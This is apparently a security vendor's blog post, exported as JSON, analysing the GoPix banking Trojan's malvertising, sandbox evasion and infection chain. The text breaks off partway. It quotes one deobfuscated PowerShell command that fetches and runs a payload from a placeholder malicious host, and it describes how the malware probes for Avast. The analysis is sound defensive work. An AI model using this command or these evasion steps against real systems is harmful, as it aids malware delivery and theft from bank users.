{"id":1930,"date":"2026-03-16T11:06:05","date_gmt":"2026-03-16T11:06:05","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/"},"modified":"2026-03-16T11:06:05","modified_gmt":"2026-03-16T11:06:05","slug":"free-real-estate-gopix-the-banking-trojan-living-off-your-memory","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","title":{"rendered":"Free real estate: GoPix, the banking Trojan living off your memory"},"content":{"rendered":"
\n

\"\"<\/p>\n

Introduction<\/h2>\n

GoPix is an advanced persistent threat targeting Brazilian financial institutions\u2019 customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions\u2019 customers.<\/p>\n

Our extensive analysis reveals GoPix\u2019s capabilities to execute man-in-the-middle attacks, monitor Pix transactions<\/a>, Boleto slips<\/a>, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.<\/p>\n

GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It\u2019s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.<\/p>\n

The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro<\/a>. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations.<\/p>\n

The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix\u2019s ability to evade traditional security defenses and steal and manipulate sensitive financial data.<\/p>\n

The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.<\/p>\n

Initial infection<\/h2>\n

Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.<\/p>\n

We have been monitoring this threat since 2023, and it continues to be very active for the time being.<\/p>\n

<\/div>\n

GoPix malware campaign detections (download<\/a>)<\/em><\/p>\n

The initial infection vector is shown below:<\/p>\n

\"Initial<\/a><\/p>\n

Initial infection vector<\/p>\n<\/div>\n

When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.<\/p>\n

\"Website<\/a><\/p>\n

Website shown if the user is detected as a bot or sandbox<\/p>\n<\/div>\n

However, if the victim passes the bot check, the malicious website will query the check.php<\/code> endpoint, which will then return a JSON response with two URLs:<\/p>\n

\"JSON<\/a><\/p>\n

JSON response from a malicious endpoint<\/p>\n<\/div>\n

The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious \u201cWhatsApp Web installer\u201d in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the 27275 port<\/a> is open on localhost.<\/p>\n

\"WebSocket<\/a><\/p>\n

WebSocket request to check if the port is open<\/p>\n<\/div>\n

This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2<\/code>). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url<\/code>), which offers to download a fake WhatsApp executable NSIS installer.
\nAt first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.<\/p>\n

\"Malware<\/a><\/p>\n

Malware delivered through a malicious website<\/p>\n<\/div>\n

Infection chain<\/h2>\n

First-stage payload<\/h3>\n

If no Avast solution is installed, an executable NSIS installer file is delivered to the victim\u2019s device. The attackers change this installer frequently to avoid detection. It\u2019s digitally signed with a stolen code signing certificate issued to \u201cPLK Management Limited\u201d, also used to sign the legitimate \u201cDriver Easy Pro\u201d software.<\/p>\n

\"Stolen<\/a><\/p>\n

Stolen certificate used to sign the malicious installer<\/p>\n<\/div>\n

The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.<\/p>\n

\"NSIS<\/a><\/p>\n

NSIS installer code creating a batch file<\/p>\n<\/div>\n

However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.<\/p>\n

\"Obfuscated<\/a><\/p>\n

Obfuscated command line inside the LNK<\/p>\n<\/div>\n

Deobfuscated command line:<\/p>\n

WindowsPowerShellv10powershell (New-Object NetWebClient)UploadString(\"http:\/\/MALICIOUS\/1\/\",\"tHSb\")|$env:E -<\/pre>\n
The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.<\/p>\n
It\u2019s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.<\/p>\n
Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it\u2019s defined as \u201cPowerShell Script\u201d).<\/p>\n
\"GoPix<\/a><\/p>\n
GoPix delivery chain<\/p>\n<\/div>\n
Initial PowerShell script<\/h3>\n
This script\u2019s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim\u2019s computer.<\/p>\n
\"System<\/a><\/p>\n
System information collection<\/p>\n<\/div>\n
The information contained within this JSON is as follows:<\/p>\n